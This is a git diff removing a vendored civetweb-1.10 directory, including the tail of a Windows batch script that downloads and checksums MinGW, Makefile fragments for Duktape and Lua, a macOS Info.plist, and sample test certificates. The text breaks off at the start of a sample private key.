-@for /f "delims=| tokens=1-6" %%a in (%repository%) do @(
-  @if "%arch%" == "%%a" (
-    @call :version_compare result "%version%" "%%b"
-    @if errorlevel 1 (
-      @call :log 0 "Failed to compare versions: %version% %%a"
-      @exit /b 1
-    )
-    @if !result! lss 0 set version=%%b
-  )
-)
-:resolve_version_done
-@if "%version%" == "" (
-  @call :log 0 "Failed to resolve latest version number"
-  @exit /b 1
-)
-@call :log 2 "Resolved version: %version%"
-@endlocal & set "%var%=%version%"
-@goto :eof
-
-:resolve_threading - Gets the threading model of the MinGW compiler
-:: %1 - The return variable for the threading model
-:: %2 - The repository information to use
-:: %3 - The architecture of the compiler
-:: %4 - The version of the compiler
-:: %5 - threading model of MinGW to use [optional]
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "repository=%~2"
-@if "%repository%" == "" @exit /b 1
-@set "arch=%~3"
-@if "%arch%" == "" @exit /b 1
-@set "version=%~4"
-@if "%version%" == "" @exit /b 1
-@set "threading=%~5"
-@if not "%threading%" == "" goto :resolve_threading_done
-@call :log 3 "Finding best threading model"
-@for /f "delims=| tokens=1-6" %%a in (%repository%) do @(
-  @if "%arch%" == "%%a" (
-    @if "%version%" == "%%b" (
-      @if not defined threading (
-        @set "threading=%%c"
-      )
-      @if "%%c" == "posix" (
-        @set "threading=%%c"
-) ) ) )
-:resolve_threading_done
-@if "%threading%" == "" (
-  @call :log 0 "Failed to resolve the best threading model"
-  @exit /b 1
-)
-@call :log 2 "Resolved threading model: %threading%"
-@endlocal & set "%var%=%threading%"
-@goto :eof
-
-:resolve_exceptions - Gets the exception model of the MinGW compiler
-:: %1 - The return variable for the exception model
-:: %2 - The repository information to use
-:: %3 - The architecture of the compiler
-:: %4 - The version of the compiler
-:: %4 - The threading model of the compiler
-:: %5 - exception model of MinGW to use [optional]
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "repository=%~2"
-@if "%repository%" == "" @exit /b 1
-@set "arch=%~3"
-@if "%arch%" == "" @exit /b 1
-@set "version=%~4"
-@if "%version%" == "" @exit /b 1
-@set "threading=%~5"
-@if "%threading%" == "" @exit /b 1
-@set "exceptions=%~6"
-@if not "%exceptions%" == "" goto :resolve_exceptions_done
-@call :log 3 "Finding best exception model"
-@for /f "delims=| tokens=1-6" %%a in (%repository%) do @(
-  @if "%arch%" == "%%a" (
-    @if "%version%" == "%%b" (
-      @if "%threading%" == "%%c" (
-        @if not defined exceptions (
-          @set "exceptions=%%d"
-        )
-        @if "%%d" == "dwarf" (
-          @set "exceptions=%%d"
-        )
-        @if "%%d" == "seh" (
-          @set "exceptions=%%d"
-) ) ) ) )
-:resolve_exceptions_done
-@if "%exceptions%" == "" (
-  @call :log 0 "Failed to resolve the best exception model"
-  @exit /b 1
-)
-@call :log 2 "Resolved exception model: %exceptions%"
-@endlocal & set "%var%=%exceptions%"
-@goto :eof
-
-:resolve_revision - Gets the revision of the MinGW compiler
-:: %1 - The return variable for the revision
-:: %2 - The repository information to use
-:: %3 - The architecture of the compiler
-:: %4 - The version of the compiler
-:: %4 - The threading model of the compiler
-:: %4 - The exception model of the compiler
-:: %5 - revision of the MinGW package to use [optional]
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "repository=%~2"
-@if "%repository%" == "" @exit /b 1
-@set "arch=%~3"
-@if "%arch%" == "" @exit /b 1
-@set "version=%~4"
-@if "%version%" == "" @exit /b 1
-@set "threading=%~5"
-@if "%threading%" == "" @exit /b 1
-@set "exceptions=%~6"
-@if "%exceptions%" == "" @exit /b 1
-@set "revision=%~7"
-@if not "%revision%" == "" goto :resolve_revision_done
-@call :log 3 "Finding latest revision"
-@for /f "delims=| tokens=1-6" %%a in (%repository%) do @(
-  @if "%arch%" == "%%a" (
-    @if "%version%" == "%%b" (
-      @if "%threading%" == "%%c" (
-        @if "%exceptions%" == "%%d" (
-          @if "%%e" gtr "%revision%" (
-            @set "revision=%%e"
-) ) ) ) ) )
-:resolve_revision_done
-@if "%revision%" == "" (
-  @call :log 0 "Failed to resolve latest revision"
-  @exit /b 1
-)
-@call :log 2 "Resolved revision: %revision%"
-@endlocal & set "%var%=%revision%"
-@goto :eof
-
-:version_compare - Compares two semantic version numbers
-:: %1 - The return variable:
-::        - < 0 : if %2 < %3
-::        -   0 : if %2 == %3
-::        - > 0 : if %2 > %3
-:: %2 - The first version to compare
-:: %3 - The second version to compare
-@setlocal
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "lhs=%~2"
-@if "%lhs%" == "" @exit /b 1
-@set "rhs=%~3"
-@if "%lhs%" == "" @exit /b 1
-@set result=0
-@for /f "delims=. tokens=1-6" %%a in ("%lhs%.%rhs%") do @(
-  @if %%a lss %%d (
-    set result=-1
-    goto :version_compare_done
-  ) else (
-    @if %%a gtr %%d (
-      set result=1
-      goto :version_compare_done
-    ) else (
-      @if %%b lss %%e (
-        set result=-1
-        goto :version_compare_done
-      ) else (
-        @if %%b gtr %%e (
-          set result=1
-          goto :version_compare_done
-        ) else (
-          @if %%c lss %%f (
-            set result=-1
-            goto :version_compare_done
-          ) else (
-            @if %%c gtr %%f (
-              set result=1
-              goto :version_compare_done
-            )
-          )
-        )
-      )
-    )
-  )
-)
-:version_compare_done
-@endlocal & set "%var%=%result%"
-@goto :eof
-
-:print_usage - Prints the usage of the script
-:: %* - message to print, each argument on it's own line
-@setlocal
-@for %%a in (%*) do @echo.%%~a
-@echo.
-@echo.build [/?][/v[v...]^|/q][/version][/arch a][/threading t]
-@echo.      [/exceptions e][/revision r] location
-@echo.
-@echo.  /version v  The version of MinGW to download
-@echo.  /arch a     The target architecture [i686^|x86_64]
-@echo.  /threading t
-@echo.              Threading model to use [posix^|win32]
-@echo.  /exceptions e
-@echo.              Exception model to use [sjlj^|seh^|dwarf]
-@echo.  /revision e Revision of the release to use
-@echo.  /v          Sets the output to be more verbose
-@echo.  /v[v...]    Extra verbosity, /vv, /vvv, etc
-@echo.  /q          Quiets the output
-@echo.  /?          Shows this usage message
-@echo.
-@endlocal
-@goto :eof
-
-:script_source - Determines if the script was ran from the cli or explorer
-:: %1 - The return variable [cli|explorer]
-@verify other 2>nul
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :log 0 "Failed to enable extensions"
-  @exit /b 1
-)
-@call :log 3 "Attempting to detect the script source"
-@echo "The invocation command was: '%cmdcmdline%'" >> %log_path%
-@for /f "tokens=1-3,*" %%a in ("%cmdcmdline%") do @(
-  set cmd=%%~a
-  set arg1=%%~b
-  set arg2=%%~c
-  set rest=%%~d
-)
-@set quote="
-@if "!arg2:~0,1!" equ "!quote!" (
-  if "!arg2:~-1!" neq "!quote!" (
-    set "arg2=!arg2:~1!"
-  )
-)
-@call :log 4 "cmd  = %cmd%"
-@call :log 4 "arg1 = %arg1%"
-@call :log 4 "arg2 = %arg2%"
-@call :log 4 "rest = %rest%"
-@call :log 4 "src  = %~f0"
-@if /i "%arg2%" == "call" (
-  set script_source=cli
-) else (
-  @if /i "%arg1%" == "/c" (
-    set script_source=explorer
-  ) else (
-    set script_source=cli
-  )
-)
-@call :log 3 "The script was invoked from %script_source%"
-@endlocal & set "%~1=%script_source%"
-@goto :eof
-
-:architecture - Finds the system architecture
-:: %1 - The return variable [i686|x86_64]
-@setlocal
-@call :log 3 "Determining the processor architecture"
-@set "key=HKLM\System\CurrentControlSet\Control\Session Manager\Environment"
-@set "var=PROCESSOR_ARCHITECTURE"
-@for /f "skip=2 tokens=2,*" %%a in ('reg query "%key%" /v "%var%"') do @set "arch=%%b"
-@if "%arch%" == "AMD64" set arch=x86_64
-@if "%arch%" == "x64" set arch=i686
-@call :log 4 "arch = %arch%"
-@endlocal & set "%~1=%arch%"
-@goto :eof
-
-:md5 - Gets the MD5 checksum for a file
-:: %1 - The hash
-:: %2 - The file path
-@setlocal
-@set "var=%~1"
-@set "file_path=%~2"
-@if "%var%" == "" @exit /b 1
-@if "%file_path%" == "" @exit /b 1
-@if not exist "%file_path%" @exit /b 1
-@for /f "skip=3 tokens=1,*" %%a in ('powershell Get-FileHash -Algorithm MD5 "'%file_path%'"') do @set hash=%%b
-@if not defined hash (
-  @call :log 6
-  @call :log 0 "Failed to get MD5 hash for %file_path%"
-  @exit /b 1
-)
-@endlocal & set "%var%=%hash: =%"
-@goto :eof
-
-:windows_version - Checks the windows version
-:: %1 - The windows version
-:: %2 - The major version number return variable
-:: %3 - The minor version number return variable
-:: %4 - The revision version number return variable
-@setlocal
-@call :log 3 "Retrieving the Windows version"
-@for /f "tokens=2 delims=[]" %%x in ('ver') do @set win_ver=%%x
-@set win_ver=%win_ver:Version =%
-@set win_ver_major=%win_ver:~0,1%
-@set win_ver_minor=%win_ver:~2,1%
-@set win_ver_rev=%win_ver:~4%
-@call :log 4 "win_ver = %win_ver%"
-@endlocal & set "%~1=%win_ver%" ^
-          & set "%~2=%win_ver_major%" ^
-          & set "%~3=%win_ver_minor%" ^
-          & set "%~4=%win_ver_rev%"
-@goto :eof
-
-:find_in_path - Finds a program of file in the PATH
-:: %1 - return variable of the file path
-@setlocal
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "file=%~2"
-@if "%file%" == "" @exit /b 1
-@call :log 3 "Searching PATH for %file%"
-@for %%x in ("%file%") do @set "file_path=%%~f$PATH:x"
-@if not defined file_path @exit /b 1
-@endlocal & set "%var%=%file_path%"
-@goto :eof
-
-:log_append - Appends another file into the current logging file
-:: %1 - the file_path to the file to concatenate
-@setlocal
-@set "file_path=%~1"
-@if "%file_path%" == "" @exit /b 1
-@call :log 3 "Appending to log: %file_path%"
-@call :iso8601 iso8601
-@set temp_log=%temp%\append-%iso8601%.log
-@call :log 4 "Using temp file %temp_log%"
-@type "%log_path%" "%file_path%" > "%temp_log%" 2>nul
-@move /y "%temp_log%" "%log_path%" 1>nul
-@del "%file_path% 2>nul
-@del "%temp_log% 2>nul
-@endlocal
-@goto :eof
-
-:iso8601 - Returns the current time in ISO8601 format
-:: %1 - the return variable
-:: %2 - format [extended|basic*]
-:: iso8601 - contains the resulting timestamp
-@setlocal
-@wmic Alias /? >NUL 2>&1 || @exit /b 1
-@set "var=%~1"
-@if "%var%" == "" @exit /b 1
-@set "format=%~2"
-@if "%format%" == "" set format=basic
-@for /F "skip=1 tokens=1-6" %%g IN ('wmic Path Win32_UTCTime Get Day^,Hour^,Minute^,Month^,Second^,Year /Format:table') do @(
-  @if "%%~l"=="" goto :iso8601_done
-  @set "yyyy=%%l"
-  @set "mm=00%%j"
-  @set "dd=00%%g"
-  @set "hour=00%%h"
-  @set "minute=00%%i"
-  @set "seconds=00%%k"
-)
-:iso8601_done
-@set mm=%mm:~-2%
-@set dd=%dd:~-2%
-@set hour=%hour:~-2%
-@set minute=%minute:~-2%
-@set seconds=%seconds:~-2%
-@if /i [%format%] == [extended] (
-  set iso8601=%yyyy%-%mm%-%dd%T%hour%:%minute%:%seconds%Z
-) else (
-  if /i [%format%] == [basic] (
-    set iso8601=%yyyy%%mm%%dd%T%hour%%minute%%seconds%Z
-  ) else (
-    @exit /b 1
-  )
-)
-@set iso8601=%iso8601: =0%
-@endlocal & set %var%=%iso8601%
-@goto :eof
-
-:verbosity - Processes the verbosity parameter '/v[v...]
-:: %1 - verbosity given on the command line
-:: logging_level - set to the number of v's
-@setlocal
-@set logging_level=0
-@set verbosity=%~1
-:verbosity_loop
-@set verbosity=%verbosity:~1%
-@if not [%verbosity%] == [] @(
-  set /a "logging_level=logging_level+1"
-  goto verbosity_loop
-)
-@endlocal & set logging_level=%logging_level%
-@goto :eof
-
-:log - Logs a message, depending on verbosity
-:: %1 - level
-::       [0-4] for CLI logging
-::       [5-9] for GUI logging
-:: %2 - message to print
-@setlocal
-@set "level=%~1"
-@set "msg=%~2"
-@if "%log_folder%" == "" (
-  echo Logging was used to early in the script, log_folder isn't set yet
-  goto :eof
-)
-@if "%log_path%" == "" (
-  echo Logging was used to early in the script, log_path isn't set yet
-  goto :eof
-)
-@if not exist "%log_folder%" mkdir "%log_folder%"
-@if not exist "%log_path%" echo. 1>nul 2>"%log_path%"
-@echo.%msg% >> "%log_path%"
-@if %level% geq 5 (
-  @if [%script_source%] == [explorer] (
-    set /a "level=level-5"
-  ) else (
-    @goto :eof
-  )
-)
-@if "%logging_level%" == "" (
-  echo Logging was used to early in the script, logging_level isn't set yet
-  goto :eof
-)
-@if %logging_level% geq %level% echo.%msg% 1>&2
-@endlocal
-@goto :eof
-
-:download - Downloads a file from the internet
-:: %1 - the url of the file to download
-:: %2 - the file to download to
-:: %3 - the MD5 checksum of the file (optional)
-@setlocal EnableDelayedExpansion
-@if errorlevel 1 (
-  @call :print_usage "Failed to enable extensions"
-  @exit /b 1
-)
-@set "url=%~1"
-@set "file_path=%~2"
-@set "checksum=%~3"
-@for %%a in (%file_path%) do @set dir_path=%%~dpa
-@for %%a in (%file_path%) do @set file_name=%%~nxa
-@if "%url%" == "" @exit /b 1
-@if "%file_path%" == "" @exit /b 1
-@if "%dir_path%" == "" @exit /b 1
-@if "%file_name%" == "" @exit /b 1
-@if not exist "%dir_path%" mkdir "%dir_path%"
-@call :log 2 "Downloading %url%"
-@call :iso8601 iso8601
-@set "temp_path=%temp%\download-%iso8601%-%file_name%"
-@set "log_path=%temp%\download-%iso8601%-log-%file_name%"
-@call :log 4 "Using temp file %temp_path%"
-@powershell Invoke-WebRequest "'%url%'" ^
-  -OutFile "'%temp_path%'" ^
-  -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::IE ^
-  1>nul 2>"%log_path%"
-@if errorlevel 1 (
-  @call :log 0 "Failed to download %url%"
-  @call :log_append "%log_path%"
-  @exit /b 1
-)
-@if [%checksum%] neq [] (
-  @call :log 4 "Checking %checksum% against %temp_path%"
-  @call :md5 hash "%temp_path%"
-  if "!hash!" neq "%checksum%" (
-    @call :log 0 "Failed to match checksum: %temp_path%"
-    @call :log 0 "Hash    : !hash!"
-    @call :log 0 "Checksum: %checksum%"
-    @exit /b 1
-  ) else (
-    @call :log 3 "Checksum matched: %temp_path%"
-    @call :log 3 "Hash    : !hash!"
-    @call :log 3 "Checksum: %checksum%"
-  )
-)
-@call :log 4 "Renaming %temp_path% to %file_path%"
-@move /y "%temp_path%" "%file_path%" 1>nul
-@endlocal
-@goto :eof
diff --git a/thirdparty/civetweb-1.10/resources/Info.plist b/thirdparty/civetweb-1.10/resources/Info.plist
deleted file mode 100644
index f02e19a..0000000
--- a/thirdparty/civetweb-1.10/resources/Info.plist
+++ /dev/null
@@ -1,21 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-  <key>CFBundleExecutable</key> <string>Civetweb</string>
-  <key>CFBundlePackageType</key> <string>APPL</string>
-  <key>CFBundleTypeRole</key> <string>None</string>
-  <key>CFBundleIconFile</key> <string>civetweb</string>
-  <key>CFBundleIconFiles</key> <array>
-    <string>civetweb_16x16.png</string>
-    <string>civetweb_22x22.png</string>
-    <string>civetweb_32x32.png</string>
-    <string>civetweb_64x64.png</string>
-  </array>
-  <key>LSUIElement</key> <true/>
-  <key>RunAtLoad</key> <true/>
-  <key>Label</key> <string>com.nofacepress.civetweb</string>
-  <key>ProgramArguments</key> <array> </array>
-  <key>KeepAlive</key> <true/>
-</dict>
-</plist>
diff --git a/thirdparty/civetweb-1.10/resources/Makefile.in-duktape b/thirdparty/civetweb-1.10/resources/Makefile.in-duktape
deleted file mode 100644
index 3a53f2e..0000000
--- a/thirdparty/civetweb-1.10/resources/Makefile.in-duktape
+++ /dev/null
@@ -1,77 +0,0 @@
-#
-# Copyright (c) 2015-2017 the Civetweb developers
-#
-# License http://opensource.org/licenses/mit-license.php MIT License
-#
-
-ifndef WITH_DUKTAPE
-  $(error WITH_DUKTAPE is not defined)
-endif
-
-# Duktape default version is 1.5.2 (105)
-WITH_DUKTAPE_VERSION ?= 105
-DUKTAPE_VERSION_KNOWN = 0
-
-# Select src and header according to the Duktape version
-ifeq ($(WITH_DUKTAPE_VERSION), 105)
-  $(info Duktape: Using version 1.5.2)
-  DUKTAPE_DIR = src/third_party/duktape-1.5.2/src
-  DUKTAPE_SHARED_LIB_FLAG = -lduktape1.5
-  DUKTAPE_CFLAGS = -DDUKTAPE_VERSION_MAKEFILE=105
-  DUKTAPE_VERSION_KNOWN = 1
-endif
-
-ifeq ($(WITH_DUKTAPE_VERSION), 108)
-  $(info Duktape: Using version 1.8.0)
-  DUKTAPE_DIR = src/third_party/duktape-1.8.0/src
-  DUKTAPE_SHARED_LIB_FLAG = -lduktape1.8
-  DUKTAPE_CFLAGS = -DDUKTAPE_VERSION_MAKEFILE=108
-  DUKTAPE_VERSION_KNOWN = 1
-endif
-
-ifeq ($(WITH_DUKTAPE_VERSION), 201)
-  $(info Duktape: Using version 2.1.1)
-  DUKTAPE_DIR = src/third_party/duktape-2.1.1/src
-  DUKTAPE_SHARED_LIB_FLAG = -lduktape2.1
-  DUKTAPE_CFLAGS = -DDUKTAPE_VERSION_MAKEFILE=201
-  DUKTAPE_VERSION_KNOWN = 1
-endif
-
-ifneq ($(DUKTAPE_VERSION_KNOWN), 1)
-  $(error Duktape: Unknwon version - $(WITH_DUKTAPE_VERSION))
-endif
-
-
-# Add flags for all Duktape versions
-DUKTAPE_CFLAGS += -I$(DUKTAPE_DIR) -DUSE_DUKTAPE
-
-ifneq ($(TARGET_OS),WIN32)
-#  DUKTAPE_CFLAGS += 
-endif
-
-ifdef WITH_DUKTAPE_SHARED
-
-  DUKTAPE_SOURCE_FILES =
-
-  $(info Duktape: using dynamic linking)
-
-else
-
-  DUKTAPE_SOURCE_FILES = duktape.c
-
-ifeq ($(WITH_DUKTAPE_VERSION), 104)
-#    DUKTAPE_SOURCE_FILES += ... TODO ...
-endif
-
-  $(info Duktape: using static library)
-
-endif
-
-DUKTAPE_SOURCES = $(addprefix $(DUKTAPE_DIR)/, $(DUKTAPE_SOURCE_FILES))
-DUKTAPE_OBJECTS = $(DUKTAPE_SOURCES:.c=.o)
-
-OBJECTS += $(DUKTAPE_OBJECTS)
-CFLAGS += $(DUKTAPE_CFLAGS)
-SOURCE_DIRS = $(DUKTAPE_DIR)
-BUILD_DIRS += $(BUILD_DIR)/$(DUKTAPE_DIR)
-
diff --git a/thirdparty/civetweb-1.10/resources/Makefile.in-lua b/thirdparty/civetweb-1.10/resources/Makefile.in-lua
deleted file mode 100644
index e91d019..0000000
--- a/thirdparty/civetweb-1.10/resources/Makefile.in-lua
+++ /dev/null
@@ -1,149 +0,0 @@
-#
-# Copyright (c) 2013 No Face Press, LLC
-# Copyright (c) 2014-2017 the Civetweb developers
-#
-# License http://opensource.org/licenses/mit-license.php MIT License
-#
-
-ifndef WITH_LUA
-  $(error WITH_LUA is not defined)
-endif
-
-# Lua Default version is 502
-WITH_LUA_VERSION ?= 502
-LUA_VERSION_KNOWN = 0
-
-# Select src and header according to the Lua version
-ifeq ($(WITH_LUA_VERSION), 501)
-  $(info Lua: Using version 5.1.5)
-  LUA_DIR = src/third_party/lua-5.1.5/src
-  LUA_SHARED_LIB_FLAG = -llua5.1
-  LUA_CFLAGS = -DLUA_VERSION_MAKEFILE=501
-  LUA_VERSION_KNOWN = 1
-endif
-ifeq ($(WITH_LUA_VERSION), 502)
-  $(info Lua: Using version 5.2.4)
-  LUA_DIR = src/third_party/lua-5.2.4/src
-  LUA_SHARED_LIB_FLAG = -llua5.2
-  LUA_CFLAGS = -DLUA_VERSION_MAKEFILE=502
-  LUA_VERSION_KNOWN = 1
-endif
-ifeq ($(WITH_LUA_VERSION), 503)
-  $(info Lua: Using version 5.3.3)
-  LUA_DIR = src/third_party/lua-5.3.3/src
-  LUA_SHARED_LIB_FLAG = -llua5.3
-  LUA_CFLAGS = -DLUA_COMPAT_5_2 -DLUA_VERSION_MAKEFILE=503
-  LUA_VERSION_KNOWN = 1
-endif
-
-ifneq ($(LUA_VERSION_KNOWN), 1)
-  $(error Lua: Unknwon version - $(WITH_LUA_VERSION))
-endif
-
-
-# Add flags for all Lua versions
-LUA_CFLAGS += -I$(LUA_DIR) -DLUA_COMPAT_ALL -DUSE_LUA
-
-ifneq ($(TARGET_OS),WIN32)
-  LUA_CFLAGS += -DLUA_USE_POSIX -DLUA_USE_DLOPEN
-endif
-
-ifdef WITH_LUA_SHARED
-
-  LUA_SOURCE_FILES =
-
-  $(info Lua: using dynamic linking)
-
-else
-
-  LUA_SOURCE_FILES = lapi.c  \
-    lauxlib.c \
-    lbaselib.c  \
-    lcode.c  \
-    ldblib.c  \
-    ldebug.c  \
-    ldo.c  \
-    ldump.c \
-    lfunc.c  \
-    lgc.c  \
-    linit.c \
-    liolib.c  \
-    llex.c \
-    lmathlib.c \
-    lmem.c  \
-    loadlib.c  \
-    lobject.c  \
-    lopcodes.c \
-    loslib.c  \
-    lparser.c  \
-    lstate.c  \
-    lstring.c \
-    lstrlib.c  \
-    ltable.c  \
-    ltablib.c \
-    ltm.c  \
-    lundump.c \
-    lvm.c  \
-    lzio.c
-
-ifeq ($(WITH_LUA_VERSION), 502)
-    LUA_SOURCE_FILES += lbitlib.c  \
-    lcorolib.c  \
-    lctype.c
-endif
-ifeq ($(WITH_LUA_VERSION), 503)
-    LUA_SOURCE_FILES += lbitlib.c  \
-    lcorolib.c  \
-    lctype.c  \
-    lutf8lib.c
-endif
-
-  $(info Lua: using static library)
-
-endif
-
-LUA_SOURCES = $(addprefix $(LUA_DIR)/, $(LUA_SOURCE_FILES))
-LUA_OBJECTS = $(LUA_SOURCES:.c=.o)
-
-OBJECTS += $(LUA_OBJECTS)
-CFLAGS += $(LUA_CFLAGS)
-SOURCE_DIRS = $(LUA_DIR)
-BUILD_DIRS += $(BUILD_DIR)/$(LUA_DIR)
-
-
-ifneq ($(WITH_LUA_VERSION), 501)
-  SQLITE_DIR = src/third_party
-  SQLITE_SOURCE_FILES = sqlite3.c lsqlite3.c
-  SQLITE_SOURCES = $(addprefix $(SQLITE_DIR)/, $(SQLITE_SOURCE_FILES))
-  SQLITE_OBJECTS = $(SQLITE_SOURCES:.c=.o)
-  SQLITE_CFLAGS = -I$(SQLITE_DIR) -DTHREADSAFE=1 -DSQLITE_ENABLE_FTS3 -DSQLITE_ENABLE_FTS3_PARENTHESIS
-  OBJECTS += $(SQLITE_OBJECTS)
-  CFLAGS += $(SQLITE_CFLAGS)
-  CFLAGS += -DUSE_LUA_SQLITE3
-  #SOURCE_DIRS = $(SQLITE_DIR)
-endif
-
-
-LFS_DIR = src/third_party
-LFS_SOURCE_FILES = lfs.c
-LFS_SOURCES = $(addprefix $(LFS_DIR)/, $(LFS_SOURCE_FILES))
-LFS_OBJECTS = $(LFS_SOURCES:.c=.o)
-LFS_CFLAGS = -I$(LFS_DIR)
-OBJECTS += $(LFS_OBJECTS)
-CFLAGS += $(LFS_CFLAGS)
-CFLAGS += -DUSE_LUA_FILE_SYSTEM
-#SOURCE_DIRS = $(LFS_DIR)
-
-
-ifneq ($(WITH_LUA_VERSION), 501)
-  LXML_DIR = src/third_party
-  LXML_SOURCE_FILES = LuaXML_lib.c
-  LXML_SOURCES = $(addprefix $(LXML_DIR)/, $(LXML_SOURCE_FILES))
-  LXML_OBJECTS = $(LXML_SOURCES:.c=.o)
-  LXML_CFLAGS = -I$(LXML_DIR)
-  OBJECTS += $(LXML_OBJECTS)
-  CFLAGS += $(LXML_CFLAGS)
-  CFLAGS += -DUSE_LUA_LUAXML
-  #SOURCE_DIRS = $(LXML_DIR)
-endif
-
diff --git a/thirdparty/civetweb-1.10/resources/Makefile.in-os b/thirdparty/civetweb-1.10/resources/Makefile.in-os
deleted file mode 100644
index a759134..0000000
--- a/thirdparty/civetweb-1.10/resources/Makefile.in-os
+++ /dev/null
@@ -1,23 +0,0 @@
-# 
-# Copyright (c) 2013 No Face Press, LLC
-# License http://opensource.org/licenses/mit-license.php MIT License
-#
-
-# Override this using TARGET_OS=LINUX on the command line
-ifeq ($(TARGET_OS),)
-  ifeq ($(OS),Windows_NT)
-    TARGET_OS = WIN32
-  else
-    UNAME_S := $(shell uname -s)
-    ifeq ($(UNAME_S),Linux)
-        TARGET_OS = LINUX
-    else
-        ifeq ($(UNAME_S),Darwin)
-            TARGET_OS = OSX
-        else
-            TARGET_OS = BSD
-        endif
-    endif
-  endif
-endif
-
diff --git a/thirdparty/civetweb-1.10/resources/cert/client.crt b/thirdparty/civetweb-1.10/resources/cert/client.crt
deleted file mode 100644
index f6bbdd8..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/client.crt
+++ /dev/null
@@ -1,19 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDBjCCAe4CCQCFpskbTEyGpTANBgkqhkiG9w0BAQsFADBFMQswCQYDVQQGEwJB
-VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
-cyBQdHkgTHRkMB4XDTE3MDkwMzE5MjIwNVoXDTI3MDkwMTE5MjIwNVowRTELMAkG
-A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
-ANyFUuYxv/uexSr/K9aSmcnEcylNH4S3NdlvMwFvW3XFqAV05tV6HnPnSELEk6t3
-8aMDUGKDBrrjwsVK6+S7OyrkioXeB9dWldHbqD7o3MkIM3sUxUtaR6x0RMZ+sIX4
-XpE0xULcip1bG0etP4Z2frEP2IOOValQcm4SCnKYZJyTr/oR31NmlIPU/47s74U6
-rqwwUE92bzvf1jGeUHEn7IAgSJNIUBNsOIdRQAMBuTJIAmG2qawXaetjLi/NBwNS
-d0OX2v3o9SrA+ZhQYpPG5xp3B3ncHgVvmhmp7hUdlYbiemcUHn18hZjxPVZLbtY8
-gQldrWyMZkVabSZjuIH3IKcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAUZsxxYVK
-l0tH8E0FCnRJTvG6gjOeiqJRIk7Mmg+hfFZK/ewqBixxg1OBM/xmPXfnI/ULRz74
-UMXnyDIsGakzrFDqWqPt3xots35yHHo2ZkVao6gV4qx0Reu86qeN5iRvG0EjoGMD
-7XRaw56E0XhvMBJW1CiUg944HSw4ptJli0dJCYa+P9s1Fop3lA0d9+dwKMKUyCDr
-yBz4XjyO9jXSQC/t0fkxC4gHhdH/ZaAq0Lem6Xxc40ZwoVc1+dHWFxn8d6L/RYvb
-16gOuw6s2Xt9h2K8OFKzehOgNZAkI2oUELRFUx9Wc8/Bcl6uEkBmPHRqeX5l35jo
-ztBrpAEsCy0cGg==
------END CERTIFICATE-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/client.csr b/thirdparty/civetweb-1.10/resources/cert/client.csr
deleted file mode 100644
index beb8466..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/client.csr
+++ /dev/null
@@ -1,16 +0,0 @@
------BEGIN CERTIFICATE REQUEST-----
-MIICijCCAXICAQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx
-ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcN
-AQEBBQADggEPADCCAQoCggEBANyFUuYxv/uexSr/K9aSmcnEcylNH4S3NdlvMwFv
-W3XFqAV05tV6HnPnSELEk6t38aMDUGKDBrrjwsVK6+S7OyrkioXeB9dWldHbqD7o
-3MkIM3sUxUtaR6x0RMZ+sIX4XpE0xULcip1bG0etP4Z2frEP2IOOValQcm4SCnKY
-ZJyTr/oR31NmlIPU/47s74U6rqwwUE92bzvf1jGeUHEn7IAgSJNIUBNsOIdRQAMB
-uTJIAmG2qawXaetjLi/NBwNSd0OX2v3o9SrA+ZhQYpPG5xp3B3ncHgVvmhmp7hUd
-lYbiemcUHn18hZjxPVZLbtY8gQldrWyMZkVabSZjuIH3IKcCAwEAAaAAMA0GCSqG
-SIb3DQEBCwUAA4IBAQB/bapQm4nxXA01msL6nkjiVaeh/mj8Cr8sPFtQXVu+hxl9
-mjbisxDXwPhiFOiTlokQkINf+RMxQsVNr2y/sGZrSMimabwODDXnPpyir4b2WOWp
-VQQWbgnMVnvgKsjBpLLDr8VnLBiQ3mED+2QV0bxxJSgvvEuiZx/BlCgiu77D/8kj
-XUY/CXIBi00fIYigpRRdv2WtMQjtQe2fCSZZKOWu2ZWu2o24kEk28x5LO/WaJ4Ft
-lUHFOIp/wkKz/US4mbdQaD0bsg7MirAyGrCmZIHqQDhdDWq+o/brI7N/8yOk3qwc
-qPGkr9PYIPnuzZwStLJlPxKGXjCA40HpdmWA0kyc
------END CERTIFICATE REQUEST-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/client.key b/thirdparty/civetweb-1.10/resources/cert/client.key
deleted file mode 100644
index f041acc..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/client.key
+++ /dev/null
@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEpAIBAAKCAQEA3IVS5jG/+57FKv8r1pKZycRzKU0fhLc12W8zAW9bdcWoBXTm
